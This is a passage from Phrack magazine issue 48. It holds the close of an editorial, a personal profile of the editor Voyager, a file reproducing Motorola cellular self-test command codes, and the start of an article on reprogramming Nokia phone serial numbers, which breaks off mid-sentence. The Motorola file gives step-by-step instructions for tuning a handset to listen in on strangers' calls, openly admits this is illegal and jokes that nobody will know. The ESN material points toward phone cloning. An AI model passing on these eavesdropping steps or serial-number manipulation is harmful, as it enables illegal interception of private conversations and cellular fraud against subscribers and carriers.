What I recognize though is that there have been scores of people that have
spent their time, at no personal gain to themselves, to help educate others
about something that they know a bit more about than the rest of us. 
   I read a lot of books to learn about hacking; I paid for them and the
authors have gotten the money they deserve.  I learned quite a bit from
college; I paid quite a lot for college.  But I have learned about hacking
most of all from hackers.  How can I repay those that have given me so much?
   We are rather fortunate to be in a position where we actually can give 
something back to them.  We can give them a new generation of hackers that
have the same opportunities to learn and to share their knowledge that we
had.  We can show them that we haven't forgotten about where we started; we
haven't forgotten about why we are hackers; and we haven't forgotten that
to be a hacker is a passion, and it is something we are proud of.  
   To my peers, consider giving something back to the community.  To the next
generation, learn from what we give and explore from what you learn; it will
soon be your turn to take our place.  And to those that made this all possible,
to those that gave their own knowledge in the name of the community, the
hundreds of authors, the ten editors, and most of all the readers: Thank You.



                              Prophile on Voyager

           Handle:  Voyager
         Call him:  Will
    Date of Birth:  06/23/69
              Age:  27
           Height:  6'
           Weight:  200lb
  Computers owned:  486DX4-100(FreeBSD), 486SX25(OS/2) and P-75 laptop(PC-DOS)

How did this handle originate?  I jumped on IRC one day and didn't want
to use my real handle, so I made this one up on the spur of the moment.

How I Got Started
I didn't start hacking computers until I went to college.  I taught
myself to use PRIMOS and I started hacking because the 150k disk quota I
was given wasn't large enough for me to compile decent sized programs.

I started hacking in '87 and didn't run into another hacker until '91.
I got Internet access and I found Phrack on  Wow!  I
thought, these people are serious.  Shortly thereafter, I compiled the
VMS client for IRC and I was talking to other hacker types on a regular

About that time, I put up a BBS.  The system is now known as "Hacker's
Haven."  The system has become fairly popular, with over 1,400 users
surviving the last 90 day purge.

In '92, I wrote a "bot" in the IRC scripting language and called it
"HackSrv." HackSrv distributed H/P files on demand and also opped all of
us regular #hack cronies.

Late in '92 I moved to Atlanta and started organizing 2600 Meetings.  We
had a blast.  We held them at my apartment.  I can't imagine what my
neighbors thought.  I still remember 40 people in my tiny living room
huddled around the TV watching sneakers.  One week, we were hacking on
one terminal, IRC'ing on another, watching a lockpicking demo on the
front door, sorting trash on the balcony, having firearms instruction in
the bedroom, and setting off bottle rockets from the kitchen to the
living room.  The last is not a good idea, by the way.

Over the course of the next few years, #hack went completely to hell.
The place became littered with clueless newbies asking clueless newbie
questions.  Other people, usually even less clueful newbies, would kick
and ban people for asking questions.  This effectively stopped all useful
conversation on #hack, as anyone who brought up a technical topic was 
likely to be kicked immediately.  This led to a group of #hack ChanOp's
who had absolutely no technical knowledge and instead wasted away the 
hours stroking their egos.  I was annoyed by the incredible cluelessness 
that had taken over the once fine channel and decided to do something 
about it.

Towards that end, I wrote the #hack FAQ.  The #hack FAQ was to be given
to new people to bring them up to speed in a short amount of time.  This, 
I reasoned, would raise the intellectual level on conversation on #hack.
It would also set the tone for conversation on #hack back to the technical
atmosphere I had known just a few years earlier.  Later, the #hack FAQ 
became the alt.2600/#hack FAQ and it's purpose was expanded to cover 
the newsgroup alt.2600.

In the Summer of '94 I moved to Denver and joined up with TNO.  TNO is a
group of friends who share an avid interest in computer and telephone
security.  Today, TNO consists of Cavalier, DisordeR, Major, Edison and

Over the last few years, I've written for Phrack, 2600, CoTNo and FUCK.
I've wanted to be Phrack editor since Taran King retired.  When ErikB
told me he was looking to retire from the job, and that I was being
considered as the next Phrack editor, it hit me just how big of a
responsibility this was.  I spoke with ReDragon (Editor of FEH) and
daemon9 (Editor of The Infinity Concept).  Together, we agreed to set
aside our current e-zine's (I was the current Editor of CoTNo) and focus
all of our attention on Phrack.  We have received offers of support from
many old and new people in the hacking community.  I am looking forward
to a bright future for Phrack.

              Women:  Sharp and quick
               Cars:  Big and fast
               Food:  Spicy to the point of pain
              Music:  Rock and Roll
Favorite performers:  Jimmy Buffett, The Eagles
    Favorite author:  Joel Rosenberg
      Favorite Book:  Unix Power Tools

Most Memorable Experiences

KL kicking me off #hack for saying that hacking was wrong.

Captain Hemp hiding my address and phone number in a bag of trash.

Reading my first sniffer log.

Getting arrested with Captain Hemp outside of a Southern Bell facility.

Finding the switch with the unpassworded root account.

Being pulled over on the way to HoHoCon while we were moshing in the

DeadKat and Cavalier doing the root dance.

Being followed by the security guard with the baby seat.

Major and I *not* getting mugged and beaten by the gang of thieves, even
though he could barely stand up and neither of us were carrying at the

Some People To Mention

Major :         You are, at the same time, one of the best people I have
                ever known and one of the worst people I have ever
                known.  I am just glad I am on your side, and you mine.
                I trust you with my life, and with a few of the 
		situations we've been through, that's not just talking.

Cavalier :      You taught us all what was important in a group.  Your
                steadiness and common sense has helped carry TNO through
                the dark times.  As always, I'm glad to have you here.
                You can always be counted on, and that means a great
                deal to me.

The Presence :  It is always a pleasure to talk to you.  You have taught
                me more than anyone else in the scene.  You will always
                be one of the best.  The strength of your ethics will
                guide you through where lesser men would fail.

Captain Hemp :  There's no one I'd rather be arrested with.

NoCar / K :     Congratulations on your new system!

The Final Question
I have met quite a few hackers.  Very few have been "geeks" in the
traditional sense of the term.  I have met hacker business people,
hacker jocks, hacker criminals, hacker stoners, hacker programmers, and
hacker skater punks.  It's a sport for just about anyone with
intelligence, dedication, and absolutely no respect for authority.



                              ==Phrack Magazine==

                 Volume Seven, Issue Forty-Eight, File 6 of 18

                      Motorola Command Mode Information

                      Written and typed up by Cherokee

NOTE: The following text is only a few pages from an official Motorola
      handbook that I received, thanks to Ob1.
                        THIS IS NOT A COMPLETE HANDBOOK 
      but it is very useful as a guide to learning how to use the self
      test instructions on the Motorola series of cellular phones.

      To actually enter the self test modes, THERE ARE SEVERAL STAGES
      BEFORE HAND THAT NEED TO BE DONE.  They depend upon what type of
      Motorola mobile phone you possess.  To my knowledge, the self test
      mode instructions are the same on every Motorola phone, the only
      difference will be how you enter the test mode. That I leave up to
      you to find out as there are lots of help files already out there,
      unless, there is a great demand for it.

      I will now show you how easy it is to use the test mode to your

      Say, your the average peeping Tom or Sally (what hacker isn't?),
      this is how to listen in on other peoples mobile conversations.

      1.Enter the test mode.
      2.Turn the speaker on (08#) also called un-muting the receive audio. 
      3.Tune into a channel(11xxxx#) (where x can range from 0 to
      600[TACS] and 1329 to 2047[ETACS].)... Although I'm not 100% sure
      of the channel mapping, (theres conversations in the range between
      600 to 1329), you'd do best to stick to playing around with these.

      You may have to try several different channels, to pick up a
      conversation, not every channel is occupied with a user.  I
      suggest you try 0 to 50, this is almost guaranteed to give you a
      result. BTW, it is actually illegal to monitor mobile
      communications without the consent of both parties, but hey, whose
      going to know? :-)

      Displaying information - Some handsets only allow display 1 line,
      and therefore you wont be able to see all of the information being
      sent to you. There are 2 ways around this. 1. Is to go and get a
      handset which can display 2 lines of information. 2. to send the
      data to your computer to display on the screen, apparently the
      data is sent and received in an unfamiliar packet format, and will
      need to be decoded.

      FINAL NOTE: 
      There are several conflicting sources for some commands, this is
      because of different versions of the ROM, so I'm putting all of
      the test codes bundled together in this file, and will update the
      list if there are any significant changes, or I find out about a
      new command in a later ROM version.

      Just one last final note to say hi to Davex[thanks for the NAM
      guide], Ratscabies, Maelstrom, Hi.T.Moonweed and Ob1.


                     Motorola Self Test Mode Instructions


Portable radio telephones are equipped for self-test, allowing service
personnel to control and monitor radiotelephone functions via the
telephone keypad.  The self-test mode operates at two levels:

1) a status display level, which allows the portable telephone to
operate normally while providing status indications in the display and;

2) the service level, which removes the portable telephone from normal
service and allows commands to be entered through the keypad to
'manually' control the operation of the radiotelephone.



This level of self-test is entered by momentarily shorting pin 6 of J2
to ground, while turning the radiotelephone on.  The self-test mode can
also be entered using the portable radiotelephone test kit (RTL4228A and

In this level of self-test mode the radiotelephone will place and
receive calls as normal except the radiotelephone displays status
information. The displayed status information alternates between the
channel number and RSSI status information, and the primary status
information (SAT frequency, carrier state, signaling tone state, power
level, voice/data channel mode, and Rx and Tx audio states).  The format
and explanation of this status information is given in Table 1 under 02#
Radio Status Request.

When dialing a phone number, the display of the status in formation
ceases when the first digit of the phone number is entered.  When the
Snd button (or End or Clr) is pressed, the status information display


  |                             NOTE
  |     While in the servicing level mode of self-test, the
  |     display does not alternate.  Only the primary status
  |     information is displayed.

The servicing level allows the servicing personnel to take control of
the radio operation by entering the test commands through the telephone
keypad.  Such parameters as operating channel, output power level
muting, and data transmission can all be selected by entering the
corresponding commands.  The servicing level is entered from the status
display level by pressing the (#) button.  At this time the radio
telephones cease to function automatically in the radiotelephone system.
Table 1 shows the test commands and the corresponding results.


Table 1. Test Commands For Self-Test Mode

| 1. Each command consists of at least two digits entered from the telephone
|    keypad with the entry terminated using the (#) key.
| 2. If the command relates to a test function with multiple data displays,
|    the (#) key is used to pause at scanning data or to step through
|    sequential test functions.  Entering the (#) key during a pause time
|    resumes scanning.
| 3. For commands that initiate an action that requires a response or that 
|    accumulates error counts, the (#) key terminates the test.
|Keypad Entry | Command Description | Status  |        Result
|             |                     | Display |
|       #     |Enter Test Command   |         |
|             |Mode                 |         |
|      01#    |Restart (Re-enter DC |         |
|             |power startup routine|         |
|      02#    |Radio Status Request | AAAA=BB | AAAA=Channel Number(decimal)
|             |                     |         | BB=RSSI reading for channel
|             |                     | CDEFGHI |   C=SAT Frequency
|             |                     |         |      0=5970 Hz
|             |                     |         |      1=6000 Hz
|             |                     |         |      2=6030 Hz
|             |                     |         |      3=No Lock
|             |                     |         |   D=Carrier(1=ON)
|             |                     |         |   E=Signaling Tone(1=ON)
|             |                     |         |   F=Power Attention Level(0-7)
|             |                     |         |   G=Mode(1=control channel
|             |                     |         |     0=voice channel
|             |                     |         |   H=Receive Audio Mute(1=muted)
|             |                     |         |   I=Transmit Audio Mute(1=muted)
|             |                     |         | When the radiotelephone is
|             |                     |         | operating in the status display
|             |                     |         | level of self-test, the
|             |                     |         | information that is displayed
|             |                     |         | alternates between AAAA BB
|             |                     |         | and CDEFGHI.  In the servicing
|             |                     |         | level of self-test, only the
|             |                     |         | information designated by
|             |                     |         | CDEFGHI is displayed.
|      03#    |  (NOT USED)         |         |
|      04#    | Initialize          |         | Carrier=OFF
|             | Transceiver         |         | Power Level=0
|             |                     |         | Receive Audio=MUTED
|             |                     |         | Transmit Audio=MUTED
|             |                     |         | Signaling Tone=OFF
|             |                     |         | SAT=OFF
|             |                     |         | DTMF & Audio Tones=OFF
|             |                     |         | Audio Path=TO SPEAKER
|      05#    | Carrier On          |         | Turn carrier on
|      06#    | Carrier Off         |         | Turn carrier off
|  NOTE: Use the PATH command (35A#) to select the audio path to test before
|  using commands 07# through 10#.
|      07#    | Rx Mute             |         | Mute the receive audio
|      08#    | Rx Un-mute          |         | Un-mute the receive audio
|      09#    | Tx Mute             |         | Mute the transmit audio
|      10#    | Tx Un-mute          |         | Un-mute the transmit audio
|    11ABCD#  | Load Synth          |         | Load synthesizer with ABCD
|             |                     |         | where ABCD =  channel number
|             |                     |         | in decimal (1329-2047, 0-600)
|      12#    | Set ATTN            |         | Set RF power attention to A
|             |                     |         | where A=attention level(0-7;
|             |                     |         | 0=maximum power)
|      13#    | RESET OFF           |         | This command should cause the
|             |                     |         | Logic Unit to set WATCH DOG
|             |                     |         | low and result in power-down
|             |                     |         | of the radiotelephone.
|      14#    | STON                |         | Transmit signaling tone 10khz
|      15#    | STOFF               |         | Stop transmitting signaling 
|             |                     |         | tone 10khz
|      16#    | SETUP               |         | Transmit a five word reverse
|             |                     |         | control channel message; each
|             |                     |         | of the five words will be
|             |                     |         | "FF00AA55CC33".  The trans-
|             |                     |         | mitter de-keys at end of 
|             |                     |         | message
|      17#    | VOICE               |         | Transmit a two word reverse
|             |                     |         | voice channel message; both
|             |                     |         | words will be "FF00AA55CC33".
|             |                     |         | The transmitter de-keys at end
|             |                     |         | of message.
|      18#    | SEND NAM            |         | AA = Address    BB = Data
|             |                     |         | Displays contents of NAM, one
|             |                     |         | address at a time, advanced
|             |                     |         | by pressing the (*) key.
|             |                     |         | Note the address goes up to 1f
|      19#    | VERSION             |         | Displays software version
|             |                     |         | number as "year, week"
|  NOTE: Entering commands 20# through 23# or 27# causes the transceiver to
| begin a counting sequence or continuous transmission as described below.
| In order to exit from the commands to enter another test command, the (#)
| key must be depressed; all other key depressions are ineffectual.
|      20#    | RCVS 1              |         | Receive control channel
|             |                     |         | messages counting correctable
|             |                     |         | and uncorrectable errors.
|             |                     |         | When the command starts, the
|             |                     |         | number of the command will be
|             |                     |         | displayed in the right hand
|             |                     |         | side of the display. Entering
|             |                     |         | a # key will terminate the
|             |                     |         | command and display a two
|             |                     |         | three digit number in the
|             |                     |         | display. The first number
|             |                     |         | is the number of correctable
|             |                     |         | errors and the second is the
|             |                     |         | uncorrectable errors.
|      21#    | RCVV 1              |         | Receive voice channel
|             |                     |         | messages counting correctable
|             |                     |         | and uncorrectable errors.
|             |                     |         | When the command starts, the
|             |                     |         | number of the command will be
|             |                     |         | displayed in the right hand
|             |                     |         | side of the display. Entering
|             |                     |         | a # key will terminate the
|             |                     |         | command and display a two
|             |                     |         | three digit number in the
|             |                     |         | display. The first number
|             |                     |         | is the number of correctable
|             |                     |         | errors and the second is the
|             |                     |         | uncorrectable errors.
|      22#    | WSTS                |         | Receive control channel
|             |                     |         | messages counting word sync
|             |                     |         | sequence. When the command
|             |                     |         | starts, the number of the
|             |                     |         | command will be displayed in
|             |                     |         | the right side of the display.
|             |                     |         | Entering a # key will 
|             |                     |         | terminate the command and 
|             |                     |         | display the number of word
|             |                     |         | sync sequences in the display.
|      23#    | WSTV                |         | Receive voice channel
|             |                     |         | messages counting word sync
|             |                     |         | sequence. When the command
|             |                     |         | starts, the number of the
|             |                     |         | command will be displayed in
|             |                     |         | the right side of the display.
|             |                     |         | Entering a # key will 
|             |                     |         | terminate the command and 
|             |                     |         | display the number of word
|             |                     |         | sync sequences in the display.
|      24#    |  (NOT USED)         |         |
|     25A#    | SATON               |         | Enable the transmission of
|             |                     |         | SAT where A = SAT frequency.
|             |                     |         | See chart below.
|             |                     |         |        A     SAT Freq.
|             |                     |         |        0      5970 Hz
|             |                     |         |        1      6000 Hz
|             |                     |         |        2      6030 Hz
|      26#    | SATOFF              |         | Disable the transmission of 
|             |                     |         | SAT.
|      27#    | TRANSMIT DATA       |         | TX continuous control channel
|             |                     |         | data.
|      32#    | CLEAR               |         | Clears non-volatile memory.
|             |                     |         | Clears all stored numbers.
|      33#    | DTMF                |         | Turn DTMF on.
|      34#    | DTMF                |         | Turn DTMF off.
|      35#    | DISPLAY RSSI        |         | 'D' series portable only.
|     35A#    | SET AUDIO PATH      |         | Where A = the following...
|             |                     |         | 1 = Speaker
|             |                     |         | 2 = Microphone
|             |                     |         | 3 = Earpiece
|      38#    | DISPLAY ESN         |         | Displays ESN in four steps,
|             |                     |         | hit * till back at start.
|      41#    |  (NOT USED)         |         | Enables diversity.
|      42#    |  (NOT USED)         |         | Disables diversity.
|      43#    |  (NOT USED)         |         | Disables diversity.
|      44#    |  (NOT USED)         |         | Disables diversity.
|      45#    | READ RSSI           |         | Returns the RSSI reading
|             |                     |         | taken on the current channel.
|             |                     |         | The number is displayed as a
|             |                     |         | three digit decimal number.
|      46#    |  (NOT USED)         |         |
|     47A#    | AUDLEV              |         | Set audio level where A=level
|             |                     |         | (0=lowest, 15=highest). The
|             |                     |         | normal level is 2.
|             |                     |         | NOTE: Use 8 to 12 only for
|             |                     |         | DTMF applications.
|      48#    | SIDETONE ON         |         | Enable sidetone(Command 05#
|             |                     |         | must also be executed.
|      49#    | SIDETONE OFF        |         | Disable sidetone(Command 06#
|             |                     |         | must also be executed.
|      50#    | MAINN               |         | Not normally used. Tests data
|             |                     |         | transmission/reception with
|             |                     |         | transmit path connected
|             |                     |         | externally to receive path.
|             |                     |         | Maintenance data is trans-
|             |                     |         | mitted and test results 
|             |                     |         | displayed:
|             |                     |         | PASS= received data is correct
|             |                     |         | FAIL=2-second timeout, no data
|             |                     |         | received, or received data is
|             |                     |         | incorrect.
|      51#    | MAINL               |         | Tests data paths internal to
|             |                     |         | the logic unit, where
|             |                     |         | maintenance data is trans-
|             |                     |         | mitted and looped back. 
|             |                     |         | Display is as follows:
|             |                     |         | PASS= received data is correct
|             |                     |         | FAIL=2-second timeout, no 
|             |                     |         | looped-back data, or 
|             |                     |         | looped-back data is incorrect.
|     52A#    |  (NOT USED)         |         |
|      53#    |  (NOT USED)         |         |
|      54#    |  (NOT USED)         |         |
|      55#    | DISPLAY/PROGRAM     | NAM     | Displays the contents of the
|             |                     |         | NAM, one step at a time, ad-
|             |                     |         | vanced by depressing the (*)
|             |                     |         | key. Only the last 7 digits
|             |                     |         | of data are displayed. Refer
|             |                     |         | to NAM programming instruct-
|             |                     |         | ions in this manual for progr-
|             |                     |         | amming details.
| 01.  02051        - System ID umber. Vodaphone=02051 Cellnet=03600
| 02.  xxxxxxxx     - A option byte (in binary)
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |            | Local use (bit A7) if set to 1 mobile will |
|      |     0      | respond to local control orders in the home|
|      |            | area. Assigned by system operator.         |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |            | Preferred system (bit A6) applies to units  |
|      |     0      | capable of operating on two service systems|
|      |            | 0 = system B   1 = system A                |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |            | End-to-end signaling (bit A5) when enabled|
|      |     1      | indicates mobile is equipped for DTMF via  |
|      |            | the keys after the landline connection is  |
|      |            | made.  1 = enabled   0 = disabled          |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |     0      | Bit not used (bit A4)                      |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |            | Repertory (bit A3) indicates the mobile is |
|      |     1      | equipped with speed-dialing storage.       |
|      |            |  1 = enabled   0 = disabled                |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |            | Aux alert (bit A2) when enabled, user can  |
|      |     1      | place the mobile in aux alert mode and be  |
|      |            | notified of incoming call via an aux device|
|      |            |  1 = enabled   0 = disabled                |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |            | H/F auto mute (bit A1) when enabled, mobile|
|      |     0      | will automatically be in the mute mode when|
|      |            | a call is made using the hands-free mode   |
|      |            |  1 = enabled   0 = disabled                |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |            | Minmark (bit A0)supplied by system operator|
|      |     0      | when enabled the users MIN2 will be sent   |
|      |            | with each call initiated or answered.      |
|      |            |  1 = enabled   0 = disabled                |
|      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| 03.  xxxxxxxxxx   - Mobile phone number
| 04.  xxxxxxxxxx   - 10 digit min
| 05.  17           - Station class mark
| 06.  09           - Access overload class (15 highest priority)
| 07.  xxxxxx       - Security code
| 08.  xxx          - Lock code
| 09.  xxxxxxxx     - B option byte (in binary)
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |     0      | bit b7    not used                         |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |     0      | bit b6    not used                         |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |     0      | bit b5    not used                         |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |            | Extended field (bit b4) when enabled, the  |
|      |     0      | mobile would scan more than 32 paging ch.  |
|      |            | currently not used in UK.                  |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |            | Single system scan (bit b3) if set to 1    |
|      |      1     | the mobile will scan only 1 system based   |
|      |            | on the setting of option byte A bit 6      |
|      |            |  1 = enabled   0 = disabled                |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |            | Auto recall (bit b2) this option allows the|
|      |      1     | user to access repertory by a 1 or 2 digit |
|      |            | send sequence                              |
|      |            |  1 = enabled   0 = disabled                |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |            | Disable service levels (bit b1) if set to 1|
|      |      0     | service levels couldn't be changed from the|
|      |            | control unit.                              |
|      |            |  0 = enabled   1 = disabled                |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |            | Lock code (bit b0) when enabled, allows the|
|      |      0     | user to lock and unlock the mobile using   |
|      |            | the three digit lock code.                 |
|      |            |  0 = enabled   1 = disabled                |
|      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| 10.  xxxxxxxx     - C option byte (in binary)
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |            | User NAM programming (bit c7) when enabled |
|      |      0     | allows user to program NAM from handset    |
|      |            |  0 = enabled   1 = disabled                |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |      0     | Single/Dual system (bit c6) 0=single 1=dual|
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |            | Call timer (bit c5) when enabled, the user |
|      |      0     | can access the call timer.                 |
|      |            |  0 = enabled   1 = disabled                |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |      1     | Auto re-dial (bit c4)                      |
|      |            |  0 = enabled   1 = disabled                |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |            | Speaker disable (bit c3) enable or disable |
|      |      1     | handset speaker when fitting hands free    |
|      |            |  0 = enabled   1 = disabled                |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |      0     | bit c2    not used                         |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |            | Selectable system (bit c1) allows user to  |
|      |      1     | select primary system.                     |
|      |            |  0 = enabled   1 = disabled                |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |      0     | bit c0    not used                         |
|      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| 11.  xxxxxxxx     - D option byte (in binary)
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |      0     | Max volume (bit d7) sets max vol to step 4 |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |      0     | Theft disable (bit d6) when set to 1, theft|
|      |            | alarm is not accessible.                   |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |      0     | Beeper disable (bit d5) 1=disable          |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |      1     | EXT DTMF(bit d4) when clear, DTMF is routed|
|      |            | directly through APC.                      |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |      0     | Flashing roam (bit d3) if enabled, roam    |
|      |            | light will flash when home area roaming.   |
|      |            |  1 = enabled   0 = disabled                |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |            | Audio convenience (bit d2) if disabled,    |
|      |      0     | audio levels are re-centered on power up.  |
|      |            |  0 = enabled   1 = disabled                |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |            | Time rx calls (bit d1) call timers will    |
|      |      0     | accumulate on incoming calls when enabled  |
|      |            |  1 = enabled   0 = disabled                |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |            | Charge rate (bit d0) when enabled,telephone|
|      |      1     | will respond to charge rate information    |
|      |            |  1 = enabled   0 = disabled                |
|      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| 12.  0023         - Initial paging system 0023=Vodaphone 0323=Cellnet   
| 13.  0023         - Initial paging channel A 
| 14.  0323         - Initial paging channel B
| 15.  021          - Dedicated paging channels
| 16.  xxxxxxxx     - E option bytes (in binary)
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |      0     | bit e7    not used                         |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |      0     | bit e6    not used                         |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |      0     | bit e5    not used                         |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |      0     | bit e4    transportable speaker present    |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |      0     | bit e3    not used                         |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |      0     | bit e2    not used                         |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |      0     | bit e1    not used                         |
|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
|      |      1     | Word sync scan disable (bit e0) portable   |
|      |            | use only.                                  |
|      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|      56#    |  (NOT USED)         |         |
|      57#    |  (NOT USED)         |         |
|      58#    | COMPANDER ON        |         | Turn compander ON
|      59#    | COMPANDER OFF       |         | Turn compander OFF
| 60# and 61# |  (NOT USED)         |         |
|      61#    | ESN TRANSFER        |         | For series I or 1? and MINI
|             |                     |         | TACS - Probably Micro TACS.
|      62#    | RNG-ON              |         | Turn the APC ringer audio
|             |                     |         | path ON.
|      63#    | RNG-OFF             |         | Turn the APC ringer audio
|             |                     |         | path OFF.
|      64#    | PLT-ON              |         | Turn the APC transmit pilot
|             |                     |         | path on.
|      65#    | PLT-OFF             |         | Turn the APC transmit pilot
|             |                     |         | path off.
| 66# thru 71#|  (NOT USED)         |         |
|      66#    | IDENTITY TRANSFER   |         | Series II and some current
|             |                     |         | portables.
|      68#    | DISPLAY FLEX AND    |         |
|             | MODEL INFO          |         |
|      69#    | USED WITH IDENTITY  |         |
|             | TRANSFER            |         |
|      72#    | MODULATION GAIN     |         | Refer to the Portable 
|             | ADJUST              |         | Telephone Phasing section for
|             |                     |         | use of this command.
|      73#    | POWER OUTPUT ADJUST |         | Refer to the Portable
|             |                     |         | Telephone Phasing section for
|             |                     |         | use of this command.
|             |                     |         | (0 to 7.)


                              ==Phrack Magazine==

                 Volume Seven, Issue Forty-Eight, File 7 of 18



                             By Damien Thorn

                                LEGAL CRAP

(mandated by our cheap-suit, can't afford cigars, polyester-pants-wearing,
no-practice-having, almost dis-barred, old-fart legal counsel who only charges
us $20 / hour because he meant to retire when he was 70 but lived a few years
longer than he expected...hell, we love him!)

Contents copyright 1994, 1995  Phoenix Rising Communications.
Software copyright 1993, 1994, 1995 as indicated.

All Rights Reserved.  Distribution of contents in hard-copy form is forbidden.
Redistribution in electronic form is permitted only as outlined in the Phrack
licensing agreement, provided this article is not segregated from the other
editorial contents of Phrack #48.

Use caution when rebuilding corrupt serial numbers, and avoid lending your
talents to further the goals of unscrupulous people.

Altering the serial number of a cellular transceiver is a violation of the
FCC rules, and the U.S. Secret Service is charged with the responsibility
of investigating fraudulent activity.

All of this material was developed in-house and not provided or
endorsed by the manufacturer.  Brand names and trademarks are used for
identification purposes only and are the property of their respective
owners.  Use of same within this article definitely does not imply agreement
with or endorsement of the material presented, and probably aggravates them
to no end.   There are no guarantees or warranties with regard to the accuracy
of this article.  Although we've done the best job that we can, we may be
wrong.  Happens all the time.  If you damage a phone or inadvertently start
a global thermonuclear war, that's your problem.  Don't come crying to us, or
make us fork over another twenty bucks to the old shyster. What you do with
this information is your responsibility.


While manufacturers publish service manuals for their cellular
transceivers, they have an annoying habit of omitting certain
data pertaining to memory devices and the arrangement of the data
stored inside them.  Since this stored information includes the
electronic serial number (ESN), the lack of documentation can
easily be excused as a way to avoid unwittingly facilitating

The drawback to the 'security through obscurity' approach is that
service technicians who have a legitimate need to reprogram these
memory devices are unable to do so.  The Nokia-designed
transceivers discussed in this article are an excellent example. 
Since the ESN is stored in the same electrically-erasable
